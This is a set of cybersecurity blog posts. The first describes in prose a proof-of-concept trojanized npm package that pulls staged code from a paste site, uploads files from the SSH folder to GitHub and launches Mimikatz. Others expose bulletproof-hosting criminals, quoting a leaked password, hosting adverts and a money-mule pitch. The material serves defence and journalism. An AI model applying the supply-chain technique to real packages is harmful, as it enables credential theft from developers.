Unseen Threats in Software Development | The Perils of Trojanized NPM Packages

Securing the supply chain against exploitation of package managers such as npm (Node Package Manager) is a challenge for many organizations. On the one hand, businesses want the productivity benefits that come from sourcing external code; on the other, they lack both control and visibility into how secure that code is. Many organizations rely on developers to know whether code dependencies are secure or not, but that is not always the case, particularly as few developers have the expertise or time to manage security issues.

In this post, we explain how NPM is used in the enterprise and highlight how threat actors can readily exploit npm to attack businesses that have yet to set up the appropriate safeguards and controls for this vector.

What is NPM?

Short for Node Package Manager, npm is a package manager for JavaScript, and is the default package manager for the JavaScript runtime environment (JRE). NPM essentially consists of:

  • NPM Command Line Interface (CLI) tool – the CLI is the primary means of installing, updating and managing NPM dependencies in JavaScript projects.
  • NPM Registry – an online database hosting thousands of public and private packages.

NPM is widely used in the enterprise for a number of reasons. First, it makes it simple for developers to share code either publicly or privately within a team, department or organization. In addition, like other code libraries, having a vast store of open-source packages allows developers to leverage existing code for common problems, improving productivity and preventing a ‘reinvent the wheel’ scenario on every new project. Moreover, adopting npm simplifies dependency management and supports both version control and automation into CI/CD pipelines.

Because npm and npm packages can extend deep into the organization’s development environment, security is a crucial issue that must be addressed. Let’s look at some examples of how easily, and severely, npm can be leveraged by threat actors.

The Targeting of npm for Exploitation

npm’s widespread use and the ease of infiltrating it, particularly among DevOps with less stringent security practices, make it an attractive target for attackers. The recent everything incident serves as a case study in how npm’s structure can be used for broader, more malicious objectives, including supply-chain style attacks that can have far-reaching impacts.

An npm user published a package named ‘everything’ which, as part of a troll campaign, contained dependencies for every other public npm package. Anyone that downloaded the package was faced with storage space exhaustion and disrupted build pipelines, effectively causing a Denial of Service (DoS).

While this incident was an isolated prank, it brings to light deeper vulnerabilities within npm, especially regarding the exploitation of postinstall scripts.

Understanding npm and Its Components

At its core, npm is a collection of modules and libraries used in Node.js development. These packages streamline project dependency management and code reuse. Packages are composed of multiple components – from code organized into modules to documentation and examples. These components are tracked via another component, the package.json file, which holds metadata and scripts set to run during package installation.

Typically, the main field in package.json points to another file, index.js, in the package’s root directory to determine what should be exported and made available for use. The index.js file in npm packages is critical for defining what the package does when installed or included in other projects.

Crucially, a specially-crafted package can leverage the postinstall functionality, to initiate whatever code is specified in the index.js file at the time of package installation.

Exploiting npm | The ‘Postinstall’ Script Vulnerability

In the following scenario, we imitate a threat actor uploading a malicious NPM package to the npm public library and staging further attack code on pastebin. The attack, if successful, exfiltrates business data to a public GitHub repository. Attackers choose public sites like pastebin and GitHub in the hope that the traffic will seem legitimate and, given that most organizations will indeed have much legitimate traffic to these sites, be easily hidden in the ‘noise’.

In order for the attack to be successful, the attacker must convince the developer to include the malicious package in their own work. This is commonly achieved through various means such as typosquatting, social engineering and poisoned website attacks.

Our proof-of-concept attack involves a maliciously crafted npm package that includes code in the index.js to call out to a public paste site (pastebin.com) where it will read the provided node.js code, and then transparently execute that code in the context of the user installing the package.

Our example pulls a dummy file from the %HOMEDIR%.ssh folder. In an actual attack, threat actors could steal the actual SSH key pairs, or siphon up whatever is available.

Contents of index.js pointing to pastebin.com
Contents of index.js pointing to pastebin.com

This particular attack scenario assumes the installation of the axios package as a dependency. Axios is a common javascript library which is used to allow for creation and manipulation of HTTP requests. It is widely supported in enterprise environments, meaning attackers can be relatively certain that it will be available.

Example of malicious code hosted on a public paste site
Example of malicious code hosted on a public paste site

In the pasted code, we have additional node.js code which gathers the requested data and then exfiltrates it to a GitHub repository. In this case, the script locates our dummy file, named “meow” and located in %HOMEDIR%.ssh. It then uploads the contents of that file to the root of the GitHub repository. Authentication is handled via a temporary GitHub personal access token.

With these components in place, the trojanized npm package is published to the public npm registry. Once installed by a ‘consumer’ of the package, the referenced index.js pipeline will be executed and the victim’s data will be uploaded.

Executing Malicious Programs Through ‘Postinstall’

This method involves leveraging postinstall scripts to run harmful programs like Mimikatz. The scripts execute with the same user permissions as the npm installation, presenting a significant security risk.

To spread the attack out we are including GitHub again, but this time as the source for our Mimikatz PowerShell one-liner. We are also staging our code again on a public paste site.

Upon installation of our trojanized npm package, the index.js file will reference the attacker code saved on the public paste site.

Staged code on paste site referencing a mimikatz one-liner
Staged code on paste site referencing a Mimikatz one-liner

This code will be interpreted, resulting in the execution of a PowerShell command, which downloads and executes Mimikatz from a public GitHub repository.

Strengthening npm Security

Attack scenarios like these and pranks like the ‘everything’ package highlight how easily npm’s system can be manipulated. Context is king in detecting these types of threats, and the indicators of attack are spread across the malicious code and network realms.

PowerShell execution of Mimikatz by-way-of-node.exe
PowerShell execution of Mimikatz by-way-of-node.exe

Countering and mitigating these threats requires controls for staging and exfiltration including monitoring and triggering on associated traffic, DNS requests, and traffic to associated IP addresses. A modern security platform with the ability to autonomously detect malicious behavior is an enterprise security essential.

Conclusion

Threat actors are constantly looking for more robust distribution mechanisms for malware and other malicious attack components. The use of npm packages as a vector is attractive to threat actors for a variety of reasons, including wide reach and ease of prolonged access.

Such attack surfaces underscore the necessity of fortifying npm against exploitation, particularly through ‘postinstall’ scripts. This requires not just reactive measures but also proactive strategies including comprehensive monitoring, traffic analysis, and the deployment of advanced security platforms. Ensuring the security of npm is crucial for maintaining its role as a trusted tool in the software development community.

To learn more about how SentinelOne can help protect your organization from these and other threats, contact us or request a free demo.

Meet Ika & Sal: The Bulletproof Hosting Duo from Hell

In 2020, the United States brought charges against four men accused of building a bulletproof hosting empire that once dominated the Russian cybercrime industry and supported multiple organized cybercrime groups. All four pleaded guilty to conspiracy and racketeering charges. But there is a fascinating and untold backstory behind the two Russian men involved, who co-ran the world’s top spam forum and worked closely with Russia’s most dangerous cybercriminals.

From January 2005 to April 2013, there were two primary administrators of the cybercrime forum Spamdot (a.k.a Spamit), an invite-only community for Russian-speaking people in the businesses of sending spam and building botnets of infected computers to relay said spam. The Spamdot admins went by the nicknames Icamis (a.k.a. Ika), and Salomon (a.k.a. Sal).

Spamdot forum administrator “Ika” a.k.a. “Icamis” responds to a message from “Tarelka,” the botmaster behind the Rustock botnet. Dmsell said: “I’m actually very glad that I switched to legal spam mailing,” prompting Tarelka and Ika to scoff.

As detailed in my 2014 book, Spam Nation, Spamdot was home to crooks controlling some of the world’s nastiest botnets, global malware contagions that went by exotic names like Rustock, Cutwail, Mega-D, Festi, Waledac, and Grum.

Icamis and Sal were in daily communications with these botmasters, via the Spamdot forum and private messages. Collectively in control over millions of spam-spewing zombies, those botmasters also continuously harvested passwords and other data from infected machines.

As we’ll see in a moment, Salomon is now behind bars, in part because he helped to rob dozens of small businesses in the United States using some of those same harvested passwords. He is currently housed in a federal prison in Michigan, serving the final stretch of a 60-month sentence.

But the identity and whereabouts of Icamis have remained a mystery to this author until recently. For years, security experts — and indeed, many top cybercriminals in the Spamit affiliate program — have expressed the belief that Sal and Icamis were likely the same person using two different identities. And there were many good reasons to support this conclusion.

For example, in 2010 Spamdot and its spam affiliate program Spamit were hacked, and its user database shows Sal and Icamis often accessed the forum from the same Internet address — usually from Cherepovets, an industrial town situated approximately 230 miles north of Moscow. Also, it was common for Icamis to reply when Spamdot members communicated a request or complaint to Sal, and vice versa.

Image: maps.google.com

Still, other clues suggested Icamis and Sal were two separate individuals. For starters, they frequently changed the status on their instant messenger clients at different times. Also, they each privately discussed with others having attended different universities.

KrebsOnSecurity began researching Icamis’s real-life identity in 2012, but failed to revisit any of that research until recently. In December 2023, KrebsOnSecurity published new details about the identity of “Rescator,” a Russian cybercriminal who is thought to be closely connected to the 2013 data breach at Target.

That story mentioned Rescator’s real-life identity was exposed by Icamis in April 2013, as part of a lengthy farewell letter Ika wrote to Spamdot members wherein Ika said he was closing the forum and quitting the cybercrime business entirely.

To no one’s shock, Icamis didn’t quit the business: He simply became more quiet and circumspect about his work, which increasingly was focused on helping crime groups siphon funds from U.S. bank accounts. But the Rescator story was a reminder that 10 years worth of research on who Ika/Icamis is in real life had been completely set aside. This post is an attempt to remedy that omission.

The farewell post from Ika (aka Icamis), the administrator of both the BlackSEO forum and Pustota, the successor forum to Spamit/Spamdot.

GENTLEMEN SCAMMERS

Icamis and Sal offered a comprehensive package of goods and services that any aspiring or accomplished spammer would need on a day-to-day basis: Virtually unlimited bulletproof domain registration and hosting services, as well as services that helped botmasters evade spam block lists generated by anti-spam groups like Spamhaus.org. Here’s snippet of Icamis’s ad on Spamdot from Aug. 2008, wherein he addresses forum members with the salutation, “Hello Gentlemen Scammers.”

We are glad to present you our services!
Many are already aware (and are our clients), but publicity is never superfluous. 🙂

Domains.
– all major gtlds (com, net, org, info, biz)
– many interesting and uninteresting cctlds
– options for any topic
– processing of any quantities
– guarantees
– exceptionally low prices for domains for white and gray schemes (including any SEO and affiliate spam )
– control panel with balances and auto-registration
– all services under the Ikamis brand, proven over the years;)

Servers.
– long-term partnerships with several [data centers] in several parts of the world for any topic
– your own data center (no longer in Russia ;)) for gray and white topics
– any configuration and any hardware
– your own IP networks (PI, not PA) and full legal support
– realtime backups to neutral sites
– guarantees and full responsibility for the services provided
– non-standard equipment on request
– our own admins to resolve any technical issues (services are free for clients)
– hosting (shared and vps) is also possible

Non-standard and related services.
– ssl certificates signed by geotrust and thawte
– old domains (any year, any quantity)
– beautiful domains (keyword, short, etc.)
– domains with indicators (any, for SEO, etc.)
– making unstable gtld domains stable
– interception and hijacking of custom domains (expensive)
– full domain posting via web.archive.org with restoration of native content (preliminary applications)
– any updates to our panels to suit your needs upon request (our own coders)

All orders for the “Domains” sections and “Servers” are carried out during the day (depending on our workload).
For non-standard and related services, a preliminary application is required 30 days in advance (except for ssl certificates – within 24 hours).

Icamis and Sal frequently claimed that their service kept Spamhaus and other anti-spam groups several steps behind their operations. But it’s clear that those anti-spam operations had a real and painful impact on spam revenues, and Salomon was obsessed with striking back at anti-spam groups, particularly Spamhaus.

In 2007, Salomon collected more than $3,000 from botmasters affiliated with competing spam affiliate programs that wanted to see Spamhaus suffer, and the money was used to fund a week-long distributed denial-of-service (DDoS) attack against Spamhaus and its online infrastructure. But rather than divert their spam botnets from their normal activity and thereby decrease sales, the botmasters voted to create a new DDoS botnet by purchasing installations of DDoS malware on thousands of already-hacked PCs (at a rate of $25 per 1,000 installs).

SALOMON

As an affiliate of Spamdot, Salomon used the email address ad1@safe-mail.net, and the password 19871987gr. The breach tracking service Constella Intelligence found the password 19871987gr was used by the email address grichishkin@gmail.com. Multiple accounts are registered to that email address under the name Alexander Valerievich Grichishkin, from Cherepovets.

In 2020, Grichishkin was arrested outside of Russia on a warrant for providing bulletproof hosting services to cybercriminal gangs. The U.S. government said Grichishkin and three others set up the infrastructure used by cybercriminals between 2009 to 2015 to distribute malware and attack financial institutions and victims throughout the United States.

Those clients included crooks using malware like Zeus, SpyEye, Citadel and the Blackhole exploit kit to build botnets and steal banking credentials.

“The Organization and its members helped their clients to access computers without authorization, steal financial information (including banking credentials), and initiate unauthorized wire transfers from victims’ financial accounts,” the government’s complaint stated.

Grichishkin pleaded guilty to conspiracy charges and was sentenced to four years in prison. He is 36 years old, has a wife and kids in Thailand, and is slated for release on February 8, 2024.

ICAMIS, THE PHANTOM GRADUATE

The identity of Icamis came into view when KrebsOnSecurity began focusing on clues that might connect Icamis to Cherepovets (Ika’s apparent hometown based on the Internet addresses he regularly used to access Spamdot).

Historic domain ownership records from DomainTools.com reveal that many of the email addresses and domains connected to Icamis invoke the name “Andrew Artz,” including icamis[.]ws, icamis[.]ru, and icamis[.]biz. Icamis promoted his services in 2003 — such as bulk-domains[.]info — using the email address icamis@4host.info. From one of his ads in 2005:

Domains For Projects Advertised By Spam

I can register bulletproof domains for sites and projects advertised by spam(of course they must be legal). I can not provide DNS for u, only domains. The price will be:

65$ for domain[if u will buy less than 5 domains]

50$ for domain[more than 5 domains]

45$ for domain[more than 10 domains]

These prices are for domains in the .net & .com zones.

If u want to order domains write me to: icamis@4host.info

In 2009, an “Andrew Artz” registered at the hosting service FirstVDS.com using the email address icamis@4host.info, with a notation saying the company name attached to the account was “WMPay.” Likewise, the bulletproof domain service icamis[.]ws was registered to an Andrew Artz.

The domain wmpay.ru is registered to the phonetically similar name “Andrew Hertz,” at andrew@wmpay.ru. A search on “icamis.ru” in Google brings up a 2003 post by him on a discussion forum designed by and for students of Amtek, a secondary school in Cherepovets (Icamis was commenting from an Internet address in Cherepovets).

The website amtek-foreva-narod.ru is still online, and it links to several yearbooks for Amtek graduates. It states that the yearbook for the Amtek class of 2004 is hosted at 41.wmpay[.]com.

The yearbook photos for the Amtek class of 2004 are not indexed in the Wayback Machine at archive.org, but the names and nicknames of 16 students remain. However, it appears that the entry for one student — the Wmpay[.]com site administrator — was removed at some point.

In 2004, the administrator of the Amtek discussion forum — a 2003 graduate who used the handle “Grand” — observed that there were three people named Andrey who graduated from Amtek in 2004, but one of them was conspicuously absent from the yearbook at wmpay[.]ru: Andrey Skvortsov.

To bring this full circle, Icamis was Andrey Skvortsov, the other Russian man charged alongside Grichiskin (the two others who pleaded guilty to conspiracy charges were from Estonia and Lithuania). All of the defendants in that case pleaded guilty to conspiracy to engage in a Racketeer Influenced Corrupt Organization (RICO).

[Author’s note: No doubt government prosecutors had their own reasons for omitting the nicknames of the defendants in their press releases, but that information sure would have saved me a lot of time and effort].

SKVORTSOV AND THE JABBERZEUS CREW

Skvortsov was sentenced to time served, and presumably deported. His current whereabouts are unknown and he was not reachable for comment via his known contact addresses.

The government says Ika and Sal’s bulletproof hosting empire provided extensive support for a highly damaging cybercrime group known as the JabberZeus Crew, which worked closely with the author of the Zeus Trojan — Evgeniy Mikhailovich Bogachev — to develop a then-advanced strain of the Zeus malware that was designed to defeat one-time codes for authentication. Bogachev is a top Russian cybercriminal with a standing $3 million bounty on his head from the FBI.

The JabberZeus Crew stole money by constantly recruiting money mules, people in the United States and in Europe who could be enticed or tricked into forwarding money stolen from cybercrime victims. Interestingly, Icamis’s various email addresses are connected to websites for a vast network of phony technology companies that claimed they needed people with bank accounts to help pay their overseas employees.

Icamis used the email address tech@safe-mail.net on Spamdot, and this email address is tied to the registration records for multiple phony technology companies that were set up to recruit money mules.

One such site — sun-technology[.]net — advertised itself as a Hong Kong-based electronics firm that was looking for “honest, responsible and motivated people in UK, USA, AU and NZ to be Sales Representatives in your particular region and receive payments from our clients. Agent commission is 5 percent of total amount received to the personal bank account. You may use your existing bank account or open a new one for these purposes.”

In January 2010, KrebsOnSecurity broke the news that the JabberZeus crew had just used money mules to steal $500,000 from tiny Duanesburg Central School District in upstate New York. As part of his sentence, Skvortsov was ordered to pay $497,200 in restitution to the Duanesburg Central School District.

The JabberZeus Crew operated mainly out of the eastern Ukraine city of Donetsk, which was always pro-Russia and is now occupied by Russian forces. But when Russia invaded Ukraine in February 2022, the alleged leader of the notorious cybercrime gang — Vyacheslav Igoravich Andreev (a.ka. Penchukov) — fled his mandatory military service orders and was arrested in Geneva, Switzerland. He is currently in federal custody awaiting trial, and is slated to be arraigned in U.S. federal court tomorrow (Jan. 9, 2024). A copy of the indictment against Andreev is here (PDF).

Andreev, aka “Tank,” seen here performing as a DJ in Ukraine in an undated photo from social media.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

The Good | Charity Scammer Indicted For Defrauding $7.5 Million Through BEC Attacks

The philanthropic world saw justice this past week with the arrest of Olusegun Samson Adejorin, a Nigerian national currently facing charges for $7.5 million for business email-based scams. The attacks targeted two U.S.-based charitable organizations and has led to an eight-count federal grand jury indictment, encompassing wire fraud, aggravated identity theft, and unauthorized access to a protected computer.

Adejorin’s fraudulent activities reportedly unfolded between June and August 2020 through an elaborate scheme involving unauthorized access to email accounts and the impersonation of employees to perpetrate the embezzlement. To facilitate withdrawals exceeding $10,000, Adejorin leveraged stolen credentials to send emails masquerading as legitimate employees who had the authority to approve such transactions. The DoJ revealed that he also acquired a credential harvesting tool, registered deceptive domain names, and concealed fraudulent emails within a legitimate employee’s mailbox to carry out the fraud.

The charges brought against Adejorin carry severe penalties, including a maximum of 20 years for wire fraud, five years for unauthorized access to a protected computer, and a mandatory two-year sentence for aggravated identity theft.

Business email compromise (BEC), also referred to as CEO fraud, has been a significant source of financial losses, with the FBI reporting billions of dollars in damages. To bolster defenses against such attacks, organizations are advised to implement measures such as multi-factor authentication (MFA), email filtering to detect and block phishing attempts, and robust verification procedures for wire transfer requests. Responding to suspicious requests, such as changes in bank account details, with a confirmation call to a predetermined number can serve as a crucial defense mechanism, potentially saving enterprises millions.

The Bad | Zeppelin Ransomware Source Code Found Listed On Cybercrime Forum For $500

Like the post-holiday sales that have trickled into the new year, dark markets and underground channels also continue to offer sales and promotions on malware kits, tools, and illicit services. Most recently, a threat actor known as ‘RET’ advertised the sale of Zeppelin ransomware builder’s source code and a cracked version for a mere $500 in a cybercrime forum.

Source: KELA Cyber Threat Intelligence

Originating from the Vega malware family, Zeppelin was active from 2019 to 2022, focusing on double extortion attacks to demand substantial ransoms from their victims. Zeppelin operators targeted a wide range of businesses and critical sectors including defense contractors, educational institutions, manufacturers, tech companies, and those in the healthcare field. According to the FBI and CISA, Zeppelin operators would execute their malware multiple times within a single compromised network, meaning victims would need several unique decryption keys to resume operations.

When law enforcement and security researchers identified exploitable flaws in Zeppelin’s encryption scheme back in November 2022, a decrypter was developed to assist affected victims, eventually leading to the discontinuation of the RaaS infrastructure. RET has reportedly asserted that the posted builder source code and cracked version up for sale is no longer susceptible to the same cryptographic weakness.

Although the authenticity remains unverified, threat intelligence researchers have acquired screenshots suggesting the legitimacy of the offer. Prospective buyers could utilize the package to establish a new ransomware-as-a-service (RaaS) operation or create a customized locker based on the Zeppelin family. RET, clarifying they did not create the malware but only managed to “crack the builder”, insisted on selling to a single buyer, temporarily halting the sale pending completion of the transaction.

The Ugly | Concern Over NPM Dependency System Sparked by Troublesome Holiday Prank

An online prank over the holidays by an NPM author has caused a wave of issues this week, disrupting build pipelines and exhausting storage space for any who installed a package called ‘everything’. Its namesake is an apt one: the ‘everything’ package systematically fetches every NPM package ever published to npmjs.com when downloaded.

Significant consequences have followed the prank campaign. Not only was the registry inundated with over 3000 packages, these packages also listed every NPM package on npmjs.com as their dependency. What this means for published authors is that they are prevented from removing/unpublishing their packages due to their inadvertent association with the ‘everything’ package. Compounding this is NPM’s policy that makes it difficult for authors to unpublish their packages if there are dependencies.

Source: BleepingComputer

The NPM package registry is a cornerstone for the global software development community, providing an extensive collection of JavaScript packages and tools. With millions of packages available, developers worldwide use NPM for collaboration, accelerating development cycles, and ensuring code reliability.

GitHub has since addressed issues arising from the ‘everything’ package, allowing packages to be removed if they meet the company’s unpublish criteria. As of this writing, the company has also confirmed that the ‘everything’ repository has been removed from GitHub and that the package itself is now appendaged with a warning message on the NPM registry where it remains.

The incident has sparked various reactions from developers facing challenges in unpublishing deprecated or experimental packages. While some deemed the stunt an exploitation of the open-source NPM system, others have highlighted its potential for malicious use such as denial of service (DoS) attacks.

The Changing Role of the CISO in 2024 | Navigating New Frontiers in Cybersecurity

As 2024 begins to unfold, the role of Chief Information Security Officers (CISO) is set to evolve as modern enterprises face new challenges in the ever-changing cybersecurity landscape. Once primarily focused on implementing security protocols and conducting periodic risk assessments, CISOs are now expected to be key decision makers, influencing corporate strategy and guiding their organization through the complexities of the current age.

The evolution of the CISO is not only a response to the growing sophistication of cyber threats but also a proactive measure to stay ahead of potential risks. This blog post delves into the evolving role of the modern CISO, from figures of security technical know-how to pivotal visionaries in strategic cybersecurity and business growth.

Changing With the Times | From Technical Gurus to Strategic & Front-Line Leaders

When the role of “chief information security officer” first came into being – recall the role didn’t exist before 1995 – the responsibilities of the CISO were centered around establishing and maintaining security protocols. Those in the role needed deep technical know-how in both networking and operating systems, including experience in implementing firewalls, conducting periodic risk assessments, and ensuring compliance with relevant regulations. The CISO served as a technical gatekeeper, responding to emerging threats as they surfaced.

Over time, as the cyber threat landscape continued to evolve, the CISO’s responsibilities expanded, with increasing involvement in policy development, risk management, and collaborating with other C-level executives to align cybersecurity strategies with broader business objectives.

The Changing Role of the CISO | Establishing Cybersecurity at the Executive Level and Beyond

Although the role of the CISO now can vary widely across organizations depending on their size and nature, it tends to lean much further into executive leadership and risk management, with a prime responsibility to keep C-suites in touch with security risks relating to organizational objectives, strategy and business outcomes.

Depending on the organization, the modern CISO will be involved in most of the following key areas of responsibility to some degree or another.

  • Cyber risk management
  • Compliance and regulatory adoption
  • Strategic business integration
  • Crisis management & Incident Response
  • Establishing & cultivating a ‘Security First’ business culture

Let’s take a look at each of these in turn.

Cyber Risk Management

Central to the role of many CISOs is the responsibility for adopting a proactive and strategic approach to identify, assess, and mitigate cyber risks. This often includes developing comprehensive risk management frameworks that align with organizational goals.

Engaging actively with executive leadership, CISOs work to articulate the potential impact of cyber threats on business operations, financial stability, and company branding, collaborating where needed with department leads across the organization to foster a culture of cybersecurity awareness and compliance.

Compliance and Regulatory Adoption

CISOs play a central role in ensuring regulatory compliance, which involves both ensuring adherence and understanding the implications of regulations on day-to-day processes and overarching strategies.

Staying knowledgeable of regulatory changes and translating them into actionable policies is a shared responsibility that CISOs undertake to safeguard data privacy and integrity.

In collaboration with legal and compliance experts, CISOs navigate the intricate frameworks of requirements and controls set by GDPR, HIPAA, or PCI DSS, for example, and then tailor security measures to meet these standards. In addition, CISOs are counted on to cultivate a culture of continuous compliance through measures such as conducting regular audits and mechanisms to address and identify gaps.

In doing so, they help to not only mitigate legal and financial risks but also fortify the organization’s reputation and stakeholder trust.

Strategic Business Integration

The evolving nature of the role can be seen in the way that many CISOs are now increasingly viewed as critical enablers in the business ecosystem. In some organizations, their insights and expertise have become invaluable in shaping product development and influencing business strategies by driving technical innovation.

In this regard, they can be key to enhancing relationships with vendors and partners, fostering a security-centric approach in all business interactions and collaborations.

Crisis Management and Incident Response

With cyber threats becoming more sophisticated and pervasive, the modern CISO is not only tasked with preventing security breaches but also with orchestrating a robust incident response (IR) strategy.

They will play a central role in the development and implementation of incident response plans (IRPs), ensuring leaders from all functions are well-prepared in the event of a cyber incident. In many organizations, CISOs collaborate with cross-functional teams, including legal, communications, and IT, to streamline response efforts during a crisis.

In some cases, the role may extend to leading post-incident analyses to understand the root causes and improve response protocols. This typically involves actively engaging with external stakeholders, regulatory bodies, and law enforcement agencies to navigate the legal and reputational ramifications of a security incident.

As crisis managers, CISOs may be expected to steer the organization away from negative fallout after cybersecurity incidents with a strategic and agile approach, minimizing the impact of breaches and maintaining business continuity.

Establishing & Cultivating a ‘Security First’ Business Culture

The modern CISO recognizes the significance of cultivating a robust security culture within the organization. They champion awareness programs, training initiatives, and communication strategies to instill a collective responsibility for cybersecurity among employees.

At the same time, CISOs may be at the forefront of advocating for advanced technologies and innovative solutions to counter evolving cyber threats, leading the evaluation and implementation of cutting-edge tools, artificial intelligence (AI), and machine learning (ML) to fortify their organization’s defenses.

Emerging Trends Impacting CISOs in 2024

The cybersecurity landscape in 2024 brings forth a spectrum of new challenges and technological advancements, necessitating a dynamic and strategic approach from CISOs.

Regulatory Compliance and Transparency: The era of mandatory information sharing is ushered in with stringent cyber laws like the SEC cyber disclosure rule. This shift to obligatory reporting amplifies the need for enhanced cyber transparency, bolstering trust in an organization’s cybersecurity measures.

Security Management Amid Digital Transformation: As businesses rapidly evolve digitally, effective management of security postures is key. CISOs are tasked with maintaining control over digital assets while aligning security strategies with the swift pace of business demands, emphasizing the need for continuous adaptation and learning.

Upgraded Cloud Security: With the rise in data breaches within cloud environments, there’s an increased focus on developing sophisticated cloud security strategies. This trend underscores the importance of comprehensive identity and access management, data encryption, and continuous monitoring to safeguard cloud-based assets.

Enhanced API Security: Following the urgency for cloud security, CISOs are also turning their attention to API security. This involves a meticulous process of identifying all APIs within the organization and assessing whether existing tools suffice in terms of visibility, control, and compliance.

AI-Driven Security Tools: The advancement of AI technology has led to a surge in AI-driven security tools. These tools not only enhance defensive capabilities but also provide strategic advantages in optimizing the deployment of existing talent and resources.

Cyber Resilience: Facing an array of evolving threats, there’s a concerted effort to build a strong security culture and improve detection, prevention, and response capabilities. This includes comprehensive updates to business continuity plans, disaster recovery strategies, and incident response protocols, ensuring an all-encompassing approach to cyber resilience.

These emerging trends underline the need for CISOs to be proactive, adaptable, and strategic. The role of the CISO is progressively evolving, requiring a blend of technical expertise, strategic planning, and leadership skills to navigate the new challenges in the cybersecurity domain effectively.

What Lies Ahead for CISOs?

As paradigms shift in tandem with rapid changes in the cyber threat landscape, proactive CISOs can work to understand these changes and revamp security within their organizations.

We enter 2024 recognizing the importance of addressing not only traditional cybersecurity concerns but also much else that has only recently come over the horizon: the need to secure physical infrastructure, IoT devices, SCADA systems, and ensure the safety of remote personnel. Add to this the new focus on cloud security, AI and stricter regulatory and compliance rules and we face an expansion that reflects the growing complexity of cybersecurity, where the digital and physical realms intersect, demanding a comprehensive approach to secure diverse assets.

Further, the widened scope of responsibilities is extending beyond digital asset management to encompass holistic organizational risk. This approach involves identifying, assessing, and mitigating risks across all facets of the organization, ensuring resilience and continuity in an ever-changing threat landscape. CISOs are now integral to not just securing data but safeguarding the entire organizational ecosystem.

In providing resources, CISOs are equipping themselves with technical tools that aid core functions and support their expanded responsibilities. The arsenal includes technologies for threat intelligence, real-time monitoring, and adaptive defenses. As technology becomes more intertwined with business operations, CISOs will increasingly leverage advanced tools to stay ahead of cyber threats.

Conclusion

The landscape for CISOs in this new year continues to unfold, with emerging trends and innovative technologies impacting their strategies and responsibilities.

The role of CISOs in today’s world is multifaceted and dynamic, going beyond traditional IT security to encompass a wide spectrum of strategic, operational, and leadership responsibilities. As part of the cybersecurity community, CISOs are collectively striving to not only protect their organizations from cyber threats, but also to drive forward-thinking strategies that align with and support business objectives.

SentinelOne’s AI-driven Singularity platform is designed to support CISOs as they safeguard their organizations from current and future threats on all attack surfaces. SentinelOne offers two free eBooks, 90 Days | A CISO’s Journey to Impact – Define Your Role and 90 Days | A CISO’s Journey to Impact – How to Drive Success, as resources for CISOs working to implement best practices in their business. For in-depth expertise and guidance, contact us for more information or book a demo.

The Next (And Very Necessary) Evolution of Cloud Security | SentinelOne Acquires PingSafe

Ric Smith, CTO, SentinelOne

Public cloud adoption and cloud native development is often touted as the future; it’s the “green grass for nimble start-ups and the digital transformation vision” across established industries. And yet, within the opportunity of the cloud, there has long been an ugly security reality brewing.

Cloud Security is broken, and outdated.

To unpack this reality and help me outline the next (and very necessary evolution) of Cloud Security, I would like to welcome my new colleague Anand Prakash, CEO and Co-founder of PingSafe.

Anand has a wealth of experience both attacking and defending cloud architectures, considered one of the world’s top five ethical hackers and prolific security researchers. His prolific work since 2012 has assisted over 400 companies in constructing “secure-by-design” tech systems, reflecting his forward-thinking mindset as the shift from on-premises to cloud computing emerged.

Anand, what is the current state of cloud security?

Anand Prakesh, CEO, PingSafe

Thank you Ric, and can I just start by saying it’s a pleasure and very exciting to be here!

The reality today is that while there are strong tools focused on solving multiple cloud security issues, whether open-source, 3rd party, or built natively in cloud service providers, they have not been designed to work together in addition to being built with purely defensive intentions.

What I mean by that is that these tools are built targeting “perfection”. I constantly see companies trying to sort through pages of endless CVE vulnerabilities or checking off compliance standards and benchmarks. But they still get hacked even after doing all of this because attackers are finding different ways to hack into a company’s cloud environment, often combining multiple vulnerabilities to create an Exploit Path.

Current “cloud security” tools and platforms are helping keep these teams busy but not really effective. The result is NOT security for cloud environments.

How many high profile cloud breaches had all of the expected security policies and compliance badges in place? And yet the breach still occurred.

Before founding PingSafe, I was helping major software companies identify bugs in their code, APIs, and infrastructure. During this period, I witnessed issues firsthand, such as attackers exploiting SSRF vulnerabilities in the target’s cloud environment to obtain the company’s cloud credentials through the metadata service (from external endpoints without direct access to their cloud environment). Additionally, incidents like subdomain takeovers due to lingering DNS entries resulted in subdomain defacement, and led companies to pay substantial bounties.

Despite the use of CSPM solutions by these companies, ethical hackers like myself continued to discover highly critical issues overlooked by these tools. This experience motivated me to create PingSafe, addressing these gaps and safeguarding customers’ cloud assets on a large scale.

Attackers have clarity with an offensive mindset, not focused on what doors are closed, but on valid, dangerous opportunities that allow for Initial Access and a large enough scope to conduct an attack.

Unfortunately, the work is heavier for defenders. Defenders have to cover and protect an ever expanding, dynamic, always changing cloud attack surface and attempt to protect everything, while attackers only need that single opportunity to sneak in.

Ric

And this remains a problem, even while we are seeing some vendors consolidate point solutions, and industry talk about the contextual benefit of CNAPP solutions? Anand, would you mind also explaining the acronym for us?

Anand

Cloud Native Application Protection Platforms! Much better as an acronym. This is a recent naming convention from Gartner. CNAPPs are solutions that combine visibility and security across three main areas: the development pipeline, cloud services (storage, identity, database), and cloud & container infrastructure.

While combining these controls in a single platform helps some organizations cut down their vendors, their main problems remain. The issue isn’t switching consoles for container pipeline scanning versus control permissions on cloud storage, it’s that generally cloud security is overwhelmingly noisy. They don’t know what is the most critical issue to solve and where to focus their time.

It’s why I believe, and created PingSafe with this intention, that an attacker’s mindset is needed to drive prioritization in cloud security. What needs to be fixed, now? For example, instead of assessing a never-ending set of theoretical attack paths, I think defenders need to know where their cloud is offering immediately exploitable activity for threat actors. Show me the evidence-based reporting that there is an Exploit Path.

Ric

Let’s spend a little time there – Attack Path vs Exploit Path?

Anand

I’m a big fan of Attack Paths, and many CNAPPs have embraced Attack Paths. They are graphical views of mapped resources with contextual awareness of vulnerabilities, misconfigurations, and public access. However, these combinations do not always equate to a genuine exploitable risk. Attack Paths are a good start, representing theoretical possibilities, but they often provide security teams with fool’s gold.

We can do better. Defenders deserve better.

What we have built with PingSafe is an Offensive Attack Engine that plays the role of an attacker and safely simulates attacks to validate which Attack Paths are actual verified Exploit Paths.

We want to give security practitioners false-positive free, evidence-based reporting to cut through the noise. This is true prioritization.

Ric

It always comes back to signals versus noise. With limited resources and time versus increasing sophistication of cloud attacks, focus on what matters.

We have always believed that beyond robust and capable platforms, today’s security teams need intelligent automation that simplifies the analyst experience and boosts the productivity of their security teams. They need to drastically reduce mean time to detect, and mean time to respond & remediate.

